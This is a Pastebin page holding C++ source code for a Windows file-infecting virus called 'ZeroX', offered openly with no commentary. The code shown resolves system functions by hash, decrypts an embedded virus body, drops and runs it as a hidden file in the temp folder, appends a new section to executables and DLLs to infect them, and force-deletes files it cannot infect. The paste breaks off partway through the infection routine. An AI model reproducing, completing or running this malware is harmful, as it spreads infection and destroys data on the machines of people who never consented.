Advertisement
FlyFar

ZeroX Virus - Source Code

Mar 2nd, 2023
606
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 32.71 KB | Cybersecurity | 0 0
  1. #include <stdio.h>
  2. #include <Windows.h>
  3. #include <ImageHlp.h>
  4. #include "ntdll.h"
  5.  
  6. #pragma comment(lib,"imagehlp.lib")
  7. #pragma comment(lib,"ntdll.lib")
  8.  
  9. #pragma comment(linker,"/include:__tls_used")
  10. #pragma section(".CRT$XLB",read)
  11.  
  12. #define Align(Value,Alignment) (((Value+Alignment-1)/Alignment)*Alignment)
  13. #define <span class="searchlite">VIRUS</span>_MARKER L"ZeroX"
  14.  
  15. typedef enum _PE_TYPE
  16. {
  17.     PeInfected=1,
  18.     PeExe,
  19.     PeDll,
  20.     PeError,
  21.     PeInvalid
  22. }PE_TYPE,*PPE_TYPE;
  23.  
  24. typedef DWORD (WINAPI *pExpandEnvironmentStringsA)(
  25.     LPCSTR lpSrc,
  26.     LPSTR lpDst,
  27.     DWORD nSize
  28.     );
  29.  
  30. typedef HANDLE (WINAPI *pCreateFileA)(
  31.     LPCSTR lpFileName,
  32.     DWORD dwDesiredAccess,
  33.     DWORD dwShareMode,
  34.     LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  35.     DWORD dwCreationDisposition,
  36.     DWORD dwFlagsAndAttributes,
  37.     HANDLE hTemplateFile
  38.     );
  39.  
  40. typedef BOOL (WINAPI *pWriteFile)(
  41.     HANDLE hFile,
  42.     LPCVOID lpBuffer,
  43.     DWORD nNumberOfBytesToWrite,
  44.     LPDWORD lpNumberOfBytesWritten,
  45.     LPOVERLAPPED lpOverlapped
  46.     );
  47.  
  48. typedef LPVOID (WINAPI *pVirtualAlloc)(
  49.     LPVOID lpAddress,
  50.     SIZE_T dwSize,
  51.     DWORD flAllocationType,
  52.     DWORD flProtect
  53.     );
  54.  
  55. typedef BOOL (WINAPI *pCloseHandle)(HANDLE Handle);
  56.  
  57. typedef BOOL (WINAPI *pVirtualFree)(
  58.     LPVOID lpAddress,
  59.     SIZE_T dwSize,
  60.     DWORD dwFreeType
  61.     );
  62.  
  63. typedef BOOL (WINAPI *pCreateProcessA)(
  64.     LPCSTR lpApplicationName,
  65.     LPSTR lpCommandLine,
  66.     LPSECURITY_ATTRIBUTES lpProcessAttributes,
  67.     LPSECURITY_ATTRIBUTES lpThreadAttributes,
  68.     BOOL bInheritHandles,
  69.     DWORD dwCreationFlags,
  70.     LPVOID lpEnvironment,
  71.     LPCSTR lpCurrentDirectory,
  72.     LPSTARTUPINFOA lpStartupInfo,
  73.     LPPROCESS_INFORMATION lpProcessInformation
  74.     );
  75.  
  76. typedef enum _HARDERROR_RESPONSE_OPTION
  77. {
  78.     OptionAbortRetryIgnore,
  79.     OptionOk,
  80.     OptionOkCancel,
  81.     OptionRetryCancel,
  82.     OptionYesNo,
  83.     OptionYesNoCancel,
  84.     OptionShutdownSystem,
  85.     OptionOkNoWait,
  86.     OptionCancelTryContinue
  87. }HARDERROR_RESPONSE_OPTION;
  88.  
  89. typedef enum _HARDERROR_RESPONSE
  90. {
  91.     ResponseReturnToCaller,
  92.     ResponseNotHandled,
  93.     ResponseAbort,
  94.     ResponseCancel,
  95.     ResponseIgnore,
  96.     ResponseNo,
  97.     ResponseOk,
  98.     ResponseRetry,
  99.     ResponseYes,
  100.     ResponseTryAgain,
  101.     ResponseContinue
  102. }HARDERROR_RESPONSE;
  103.  
  104. extern "C" NTSTATUS NTAPI NtRaiseHardError(
  105.     NTSTATUS ErrorStatus,
  106.     ULONG NumberOfParameters,
  107.     ULONG UnicodeStringParameterMask,
  108.     PULONG_PTR Parameters,
  109.     ULONG ValidResponseOptions,
  110.     PULONG Response
  111. );
  112.  
  113. PVOID <span class="searchlite">Virus</span>File;
  114. ULONG <span class="searchlite">Virus</span>Size,<span class="searchlite">Virus</span>FileChecksum;
  115.  
  116. wchar_t <span class="searchlite">Virus</span>Path[60];
  117.  
  118. void __fastcall RC4(PVOID Buffer,ULONG Length,PULONG Key)
  119. {
  120.     ULONG i,j,x;
  121.     UCHAR State[256],Swap,*k=(PUCHAR)Key,*ptr=(PUCHAR)Buffer;
  122.  
  123.     for(i=0;i<256;i++)
  124.     {
  125.         State[i]=(UCHAR)i;
  126.     }
  127.  
  128.     j=0;
  129.  
  130.     for(i=0;i<256;i++)
  131.     {
  132.         j=(j+State[i]+k[i % sizeof(ULONG)]) & 0xFF;
  133.         Swap=State[i];
  134.  
  135.         State[i]=State[j];
  136.         State[j]=Swap;
  137.     }
  138.  
  139.     i=0;
  140.     j=0;
  141.  
  142.     for(x=0;x<Length;x++)
  143.     {
  144.         i=(i+1) & 0xFF;
  145.         j=(j+State[i]) & 0xFF;
  146.  
  147.         Swap=State[i];
  148.  
  149.         State[i]=State[j];
  150.         State[j]=Swap;
  151.  
  152.         ptr[x]^=State[(State[i]+State[j]) & 0xFF];
  153.     }
  154. }
  155.  
  156. ULONG __fastcall ComputeHash(PVOID Buffer,ULONG Length)
  157. {
  158.     ULONG i,Hash=0,HashTable[256];
  159.     PUCHAR ptr=(PUCHAR)Buffer;
  160.  
  161.     for(i=0;i<256;i++)
  162.     {
  163.         HashTable[i]=(i & 1) ? (i+(i<<28))^0x12345678:(i+(i<<28))^0x98765432;
  164.     }
  165.  
  166.     for(i=0;i<Length;i++)
  167.     {
  168.         Hash=(i+Hash+HashTable[(Hash+ptr[i]-(~Hash)) & 0xFF])^((~ptr[i])+(ptr[i]<<16)-HashTable[(i+(Hash^ptr[i])) & 0xFF]);
  169.     }
  170.  
  171.     return Hash;
  172. }
  173.  
  174. PIMAGE_SECTION_HEADER __fastcall AddSection(PVOID Image,ULONG SectionSize,ULONG Characteristics)
  175. {
  176.     PIMAGE_DOS_HEADER pIDH;
  177.     PIMAGE_NT_HEADERS pINH;
  178.     PIMAGE_SECTION_HEADER pISH;
  179.  
  180.     ULONG i;
  181.  
  182.     pIDH=(PIMAGE_DOS_HEADER)Image;
  183.  
  184.     if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
  185.     {
  186.         return NULL;
  187.     }
  188.  
  189.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Image+pIDH->e_lfanew);
  190.  
  191.     if(pINH->Signature!=IMAGE_NT_SIGNATURE)
  192.     {
  193.         return NULL;
  194.     }
  195.  
  196.     pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
  197.     i=pINH->FileHeader.NumberOfSections;
  198.  
  199.     memset(&pISH[i],0,sizeof(IMAGE_SECTION_HEADER));
  200.  
  201.     pISH[i].Misc.VirtualSize=SectionSize;
  202.     pISH[i].VirtualAddress=Align(pISH[i-1].VirtualAddress+pISH[i-1].Misc.VirtualSize,pINH->OptionalHeader.SectionAlignment);
  203.     pISH[i].SizeOfRawData=Align(SectionSize,pINH->OptionalHeader.SectionAlignment);
  204.     pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
  205.     pISH[i].Characteristics=Characteristics;
  206.     pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
  207.  
  208.     pINH->FileHeader.NumberOfSections++;
  209.     pINH->OptionalHeader.SizeOfImage=pISH[i].VirtualAddress+pISH[i].Misc.VirtualSize;
  210.  
  211.     pINH->OptionalHeader.CheckSum=0;
  212.     return &pISH[i];
  213. }
  214.  
  215. ULONG WINAPI Exe<span class="searchlite">Virus</span>Code()
  216. {
  217.     PIMAGE_DOS_HEADER pIDH;
  218.     PIMAGE_NT_HEADERS pINH;
  219.     PIMAGE_EXPORT_DIRECTORY pIED;
  220.  
  221.     PLDR_DATA_TABLE_ENTRY Ldr;
  222.  
  223.     PVOID Buffer,Module,Kernel32Base;
  224.     ULONG i,j,x,Hash,FileSize,Key,EntryPointRva,<span class="searchlite">Virus</span>Rva,write;
  225.  
  226.     PUCHAR Encrypted<span class="searchlite">Virus</span>,Decrypted<span class="searchlite">Virus</span>,k,ptr;
  227.     PULONG Function,Name;
  228.     PUSHORT Ordinal;
  229.  
  230.     UCHAR State[256],Swap;
  231.     HANDLE hFile;
  232.  
  233.     PPEB Peb;
  234.  
  235.     STARTUPINFOA si;
  236.     PROCESS_INFORMATION pi;
  237.  
  238.     pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
  239.     pCreateFileA fnCreateFileA;
  240.     pWriteFile fnWriteFile;
  241.     pVirtualAlloc fnVirtualAlloc;
  242.     pCloseHandle fnCloseHandle;
  243.     pVirtualFree fnVirtualFree;
  244.     pCreateProcessA fnCreateProcessA;
  245.  
  246.     char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','X','.','e','x','e',0},FileName[260];
  247.  
  248.     __asm
  249.     {
  250.         mov eax,0x41414141
  251.         mov EntryPointRva,eax
  252.  
  253.         mov eax,0x42424242
  254.         mov <span class="searchlite">Virus</span>Rva,eax
  255.  
  256.         mov eax,0x43434343
  257.         mov FileSize,eax
  258.     }
  259.  
  260.     Peb=(PPEB)__readfsdword(0x30); // Get the PEB address
  261.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data
  262.  
  263.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
  264.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32
  265.  
  266.     Kernel32Base=Ldr->DllBase; // Store the address of kernel32
  267.     Module=Peb->ImageBaseAddress;
  268.  
  269.     pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
  270.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);
  271.  
  272.     // Get the export directory of kernel32
  273.  
  274.     pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  275.  
  276.     Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
  277.     Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);
  278.  
  279.     Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);
  280.  
  281.     // Loop over the function names
  282.  
  283.     for(i=0;i<pIED->NumberOfNames;i++)
  284.     {
  285.         PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
  286.         ULONG Hash=0;
  287.  
  288.         // Compute the hash
  289.  
  290.         while(*ptr)
  291.         {
  292.             Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
  293.             ptr++;
  294.         }
  295.  
  296.         // Hash of ExpandEnvironmentStringsA
  297.  
  298.         if(Hash==0x575d1e20)
  299.         {
  300.             fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  301.         }
  302.  
  303.         // Hash of CreateFileA
  304.  
  305.         if(Hash==0xd83eb415)
  306.         {
  307.             fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  308.         }
  309.  
  310.         // Hash of WriteFile
  311.  
  312.         if(Hash==0xa5e7378b)
  313.         {
  314.             fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  315.         }
  316.  
  317.         // Hash of VirtualAlloc
  318.  
  319.         if(Hash==0xa15d96d2)
  320.         {
  321.             fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  322.         }
  323.  
  324.         // Hash of CloseHandle
  325.  
  326.         if(Hash==0x7dfbd342)
  327.         {
  328.             fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  329.         }
  330.  
  331.         // Hash of VirtualFree
  332.  
  333.         if(Hash==0x6f043b69)
  334.         {
  335.             fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  336.         }
  337.  
  338.         // Hash of CreateProcessA
  339.  
  340.         if(Hash==0xae3b3c74)
  341.         {
  342.             fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  343.         }
  344.     }
  345.  
  346.     Encrypted<span class="searchlite">Virus</span>=(PUCHAR)Module+<span class="searchlite">Virus</span>Rva; // Get the <span class="searchlite">virus</span> body
  347.     Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer
  348.  
  349.     if(Buffer)
  350.     {
  351.         pIDH=(PIMAGE_DOS_HEADER)Module;
  352.         pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Module+pIDH->e_lfanew);
  353.  
  354.         Decrypted<span class="searchlite">Virus</span>=(PUCHAR)Buffer;
  355.  
  356.         Key=pINH->FileHeader.TimeDateStamp;
  357.         k=(PUCHAR)&Key;
  358.  
  359.         for(i=0;i<256;i++)
  360.         {
  361.             State[i]=(UCHAR)i;
  362.         }
  363.  
  364.         j=0;
  365.  
  366.         for(i=0;i<256;i++)
  367.         {
  368.             j=(j+State[i]+k[i % sizeof(ULONG)]) & 0xFF;    
  369.             Swap=State[i];
  370.  
  371.             State[i]=State[j];
  372.             State[j]=Swap;
  373.         }
  374.  
  375.         i=0;
  376.         j=0;
  377.  
  378.         for(x=0;x<FileSize;x++)
  379.         {
  380.             i=(i+1) & 0xFF;
  381.             j=(j+State[i]) & 0xFF;
  382.  
  383.             Swap=State[i];
  384.  
  385.             State[i]=State[j];      
  386.             State[j]=Swap;
  387.  
  388.             Decrypted<span class="searchlite">Virus</span>[x]=Encrypted<span class="searchlite">Virus</span>[x]^State[(State[i]+State[j]) & 0xFF];
  389.         }
  390.  
  391.         fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));
  392.  
  393.         // Drop the <span class="searchlite">virus</span> in temp folder
  394.  
  395.         hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
  396.  
  397.         if(hFile!=INVALID_HANDLE_VALUE)
  398.         {
  399.             // Write the <span class="searchlite">virus</span> to file
  400.  
  401.             if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
  402.             {
  403.                 fnCloseHandle(hFile); // Close the file handle
  404.                 fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer
  405.  
  406.                 ptr=(PUCHAR)&si;
  407.  
  408.                 // Zero the structures
  409.  
  410.                 for(i=0;i<sizeof(si);i++)
  411.                 {
  412.                     ptr[i]=0;
  413.                 }
  414.  
  415.                 ptr=(PUCHAR)&pi;
  416.  
  417.                 for(i=0;i<sizeof(pi);i++)
  418.                 {
  419.                     ptr[i]=0;
  420.                 }
  421.  
  422.                 // Run the <span class="searchlite">virus</span> executable
  423.  
  424.                 if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
  425.                 {
  426.                     fnCloseHandle(pi.hThread);
  427.                     fnCloseHandle(pi.hProcess);
  428.                 }
  429.             }
  430.         }
  431.     }
  432.  
  433.     // Call the original entry point
  434.  
  435.     __asm
  436.     {
  437.         mov eax,Module
  438.         add eax,EntryPointRva
  439.  
  440.         call eax
  441.     }
  442. }
  443.  
  444. ULONG WINAPI Dll<span class="searchlite">Virus</span>Code(HMODULE hModule,ULONG Reason,PVOID Context)
  445. {
  446.     PIMAGE_DOS_HEADER pIDH;
  447.     PIMAGE_NT_HEADERS pINH;
  448.     PIMAGE_EXPORT_DIRECTORY pIED;
  449.  
  450.     PLDR_DATA_TABLE_ENTRY Ldr;
  451.  
  452.     PVOID Buffer,Kernel32Base;
  453.     ULONG i,j,x,Hash,FileSize,Key,EntryPointRva,<span class="searchlite">Virus</span>Rva,write;
  454.  
  455.     PUCHAR Encrypted<span class="searchlite">Virus</span>,Decrypted<span class="searchlite">Virus</span>,k,ptr;
  456.     PULONG Function,Name;
  457.     PUSHORT Ordinal;
  458.  
  459.     UCHAR State[256],Swap;
  460.     HANDLE hFile;
  461.  
  462.     PPEB Peb;
  463.  
  464.     STARTUPINFOA si;
  465.     PROCESS_INFORMATION pi;
  466.  
  467.     pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
  468.     pCreateFileA fnCreateFileA;
  469.     pWriteFile fnWriteFile;
  470.     pVirtualAlloc fnVirtualAlloc;
  471.     pCloseHandle fnCloseHandle;
  472.     pVirtualFree fnVirtualFree;
  473.     pCreateProcessA fnCreateProcessA;
  474.  
  475.     char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','X','.','e','x','e',0},FileName[260];
  476.  
  477.     __asm
  478.     {
  479.         mov eax,0x41414141
  480.         mov EntryPointRva,eax
  481.  
  482.         mov eax,0x42424242
  483.         mov <span class="searchlite">Virus</span>Rva,eax
  484.  
  485.         mov eax,0x43434343
  486.         mov FileSize,eax
  487.     }
  488.  
  489.     Peb=(PPEB)__readfsdword(0x30); // Get the PEB address
  490.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data
  491.  
  492.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
  493.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32
  494.  
  495.     Kernel32Base=Ldr->DllBase; // Store the address of kernel32
  496.  
  497.     pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
  498.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);
  499.  
  500.     // Get the export directory of kernel32
  501.  
  502.     pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  503.  
  504.     Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
  505.     Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);
  506.  
  507.     Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);
  508.  
  509.     // Loop over the function names
  510.  
  511.     for(i=0;i<pIED->NumberOfNames;i++)
  512.     {
  513.         PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
  514.         ULONG Hash=0;
  515.  
  516.         // Compute the hash
  517.  
  518.         while(*ptr)
  519.         {
  520.             Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
  521.             ptr++;
  522.         }
  523.  
  524.         // Hash of ExpandEnvironmentStringsA
  525.  
  526.         if(Hash==0x575d1e20)
  527.         {
  528.             fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  529.         }
  530.  
  531.         // Hash of CreateFileA
  532.  
  533.         if(Hash==0xd83eb415)
  534.         {
  535.             fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  536.         }
  537.  
  538.         // Hash of WriteFile
  539.  
  540.         if(Hash==0xa5e7378b)
  541.         {
  542.             fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  543.         }
  544.  
  545.         // Hash of VirtualAlloc
  546.  
  547.         if(Hash==0xa15d96d2)
  548.         {
  549.             fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  550.         }
  551.  
  552.         // Hash of CloseHandle
  553.  
  554.         if(Hash==0x7dfbd342)
  555.         {
  556.             fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  557.         }
  558.  
  559.         // Hash of VirtualFree
  560.  
  561.         if(Hash==0x6f043b69)
  562.         {
  563.             fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  564.         }
  565.  
  566.         // Hash of CreateProcessA
  567.  
  568.         if(Hash==0xae3b3c74)
  569.         {
  570.             fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  571.         }
  572.     }
  573.  
  574.     Encrypted<span class="searchlite">Virus</span>=(PUCHAR)hModule+<span class="searchlite">Virus</span>Rva; // Get the <span class="searchlite">virus</span> body
  575.     Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer
  576.  
  577.     if(Buffer)
  578.     {
  579.         pIDH=(PIMAGE_DOS_HEADER)hModule;
  580.         pINH=(PIMAGE_NT_HEADERS)((PUCHAR)hModule+pIDH->e_lfanew);
  581.  
  582.         Decrypted<span class="searchlite">Virus</span>=(PUCHAR)Buffer;
  583.  
  584.         Key=pINH->FileHeader.TimeDateStamp;
  585.         k=(PUCHAR)&Key;
  586.  
  587.         for(i=0;i<256;i++)
  588.         {
  589.             State[i]=(UCHAR)i;
  590.         }
  591.  
  592.         j=0;
  593.  
  594.         for(i=0;i<256;i++)
  595.         {
  596.             j=(j+State[i]+k[i % sizeof(ULONG)]) & 0xFF;    
  597.             Swap=State[i];
  598.  
  599.             State[i]=State[j];
  600.             State[j]=Swap;
  601.         }
  602.  
  603.         i=0;
  604.         j=0;
  605.  
  606.         for(x=0;x<FileSize;x++)
  607.         {
  608.             i=(i+1) & 0xFF;
  609.             j=(j+State[i]) & 0xFF;
  610.  
  611.             Swap=State[i];
  612.  
  613.             State[i]=State[j];      
  614.             State[j]=Swap;
  615.  
  616.             Decrypted<span class="searchlite">Virus</span>[x]=Encrypted<span class="searchlite">Virus</span>[x]^State[(State[i]+State[j]) & 0xFF];
  617.         }
  618.  
  619.         fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));
  620.  
  621.         // Drop the <span class="searchlite">virus</span> in temp folder
  622.  
  623.         hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
  624.  
  625.         if(hFile!=INVALID_HANDLE_VALUE)
  626.         {
  627.             // Write the <span class="searchlite">virus</span> to file
  628.  
  629.             if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
  630.             {
  631.                 fnCloseHandle(hFile); // Close the file handle
  632.                 fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer
  633.  
  634.                 ptr=(PUCHAR)&si;
  635.  
  636.                 // Zero the structures
  637.  
  638.                 for(i=0;i<sizeof(si);i++)
  639.                 {
  640.                     ptr[i]=0;
  641.                 }
  642.  
  643.                 ptr=(PUCHAR)&pi;
  644.  
  645.                 for(i=0;i<sizeof(pi);i++)
  646.                 {
  647.                     ptr[i]=0;
  648.                 }
  649.  
  650.                 // Run the <span class="searchlite">virus</span> executable
  651.  
  652.                 if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
  653.                 {
  654.                     fnCloseHandle(pi.hThread);
  655.                     fnCloseHandle(pi.hProcess);
  656.                 }
  657.             }
  658.         }
  659.     }
  660.  
  661.     // Call the original entry point
  662.  
  663.     __asm
  664.     {
  665.         mov eax,hModule
  666.         add eax,EntryPointRva
  667.  
  668.         push Context
  669.         push Reason
  670.         push hModule
  671.  
  672.         call eax
  673.     }
  674. }
  675.  
  676. void WINAPI <span class="searchlite">Virus</span>End()
  677. {
  678.     return;
  679. }
  680.  
  681. ULONG __fastcall IsValidExecutable(HANDLE hFile,PULONG SectionAlignment)
  682. {
  683.     PIMAGE_DOS_HEADER pIDH;
  684.     PIMAGE_NT_HEADERS pINH;
  685.  
  686.     BOOL IsDll;
  687.      
  688.     PVOID Buffer;
  689.     ULONG FileSize,read;
  690.  
  691.     FileSize=GetFileSize(hFile,NULL);
  692.     Buffer=VirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
  693.  
  694.     if(!Buffer)
  695.     {
  696.         return PeError;
  697.     }
  698.  
  699.     if(!ReadFile(hFile,Buffer,FileSize,&read,NULL))
  700.     {
  701.         VirtualFree(Buffer,0,MEM_RELEASE);
  702.         return PeError;
  703.     }
  704.  
  705.     __try
  706.     {
  707.         if(ComputeHash(Buffer,FileSize)==<span class="searchlite">Virus</span>FileChecksum)
  708.         {
  709.             VirtualFree(Buffer,0,MEM_RELEASE);
  710.             return PeInfected;
  711.         }
  712.  
  713.         pIDH=(PIMAGE_DOS_HEADER)Buffer;
  714.          
  715.         if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
  716.         {
  717.             VirtualFree(Buffer,0,MEM_RELEASE);
  718.             return PeInvalid;
  719.         }
  720.  
  721.         pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Buffer+pIDH->e_lfanew);
  722.  
  723.         if(pINH->Signature!=IMAGE_NT_SIGNATURE)
  724.         {
  725.             VirtualFree(Buffer,0,MEM_RELEASE);
  726.             return PeInvalid;
  727.         }
  728.  
  729.         // Make sure it is 32-bit program
  730.  
  731.         if(pINH->FileHeader.Machine!=IMAGE_FILE_MACHINE_I386)
  732.         {
  733.             VirtualFree(Buffer,0,MEM_RELEASE);
  734.             return PeInvalid;
  735.         }
  736.  
  737.         if(pINH->OptionalHeader.Subsystem!=IMAGE_SUBSYSTEM_WINDOWS_GUI && pINH->OptionalHeader.Subsystem!=IMAGE_SUBSYSTEM_WINDOWS_CUI)
  738.         {
  739.             VirtualFree(Buffer,0,MEM_RELEASE);
  740.             return PeInvalid;
  741.         }
  742.  
  743.         if(!wcscmp(<span class="searchlite">VIRUS</span>_MARKER,(PWSTR)(pIDH+1)))
  744.         {
  745.             VirtualFree(Buffer,0,MEM_RELEASE);
  746.             return PeInfected;
  747.         }
  748.  
  749.         if(pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
  750.         {
  751.             VirtualFree(Buffer,0,MEM_RELEASE);
  752.             return PeInvalid;
  753.         }
  754.  
  755.         if(pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_CUI || pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_GUI)
  756.         {
  757.             IsDll=(pINH->FileHeader.Characteristics & IMAGE_FILE_DLL)!=0;
  758.             *SectionAlignment=pINH->OptionalHeader.FileAlignment;
  759.  
  760.             VirtualFree(Buffer,0,MEM_RELEASE);
  761.             return IsDll ? PeDll:PeExe;
  762.         }
  763.     }
  764.  
  765.     __except(EXCEPTION_EXECUTE_HANDLER)
  766.     {
  767.         VirtualFree(Buffer,0,MEM_RELEASE);
  768.         return FALSE;
  769.     }
  770.  
  771.     VirtualFree(Buffer,0,MEM_RELEASE);
  772.     return FALSE;
  773. }
  774.  
  775. void __fastcall ForceDeleteFile(PWSTR FileName)
  776. {
  777.     UNICODE_STRING Name;
  778.     OBJECT_ATTRIBUTES oa;
  779.  
  780.     // Convert Win32 pathname to NT pathname
  781.  
  782.     if(RtlDosPathNameToNtPathName_U(FileName,&Name,NULL,NULL))
  783.     {
  784.         InitializeObjectAttributes(&oa,&Name,OBJ_CASE_INSENSITIVE,NULL,NULL);
  785.         NtDeleteFile(&oa); // Delete the file
  786.  
  787.         RtlFreeUnicodeString(&Name); // Free the string
  788.     }
  789. }
  790.  
  791. void __fastcall InfectFile(PWSTR FileName)
  792. {
  793.     PIMAGE_DOS_HEADER pIDH;
  794.     PIMAGE_NT_HEADERS pINH;
  795.     PIMAGE_SECTION_HEADER pISH;
  796.      
  797.     HANDLE hFile,hMap;
  798.     PVOID MappedFile;
  799.     ULONG i,Key,PeType,FileSize,SectionAlignment,SectionSize,CodeSize,NewSize,OldChecksum,NewChecksum;
  800.  
  801.     PUCHAR CodeAddress,<span class="searchlite">Virus</span>Address,ptr;
  802.  
  803.     hFile=CreateFile(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
  804.  
  805.     if(hFile!=INVALID_HANDLE_VALUE)
  806.     {
  807.         PeType=IsValidExecutable(hFile,&SectionAlignment);
  808.  
  809.         if(PeType==PeError || PeType==PeInfected)
  810.         {
  811.             NtClose(hFile);
  812.             return;
  813.         }
  814.  
  815.         if(PeType==PeInvalid)
  816.         {
  817.             NtClose(hFile);
  818.  
  819.             ForceDeleteFile(FileName);
  820.             return;
  821.         }
  822.  
  823.         CodeSize=PeType==PeDll ? (ULONG)<span class="searchlite">Virus</span>End-(ULONG)Dll<span class="searchlite">Virus</span>Code:(ULONG)Dll<span class="searchlite">Virus</span>Code-(ULONG)Exe<span class="searchlite">Virus</span>Code;
  824.         SectionSize=CodeSize+<span class="searchlite">Virus</span>Size+SectionAlignment;
  825.  
  826.         FileSize=GetFileSize(hFile,NULL);
  827.         NewSize=FileSize+Align(SectionSize,SectionAlignment); // File size need to be aligned. Otherwise the program will not run after infection.
  828.  
  829.         hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,NewSize,NULL);
  830.  
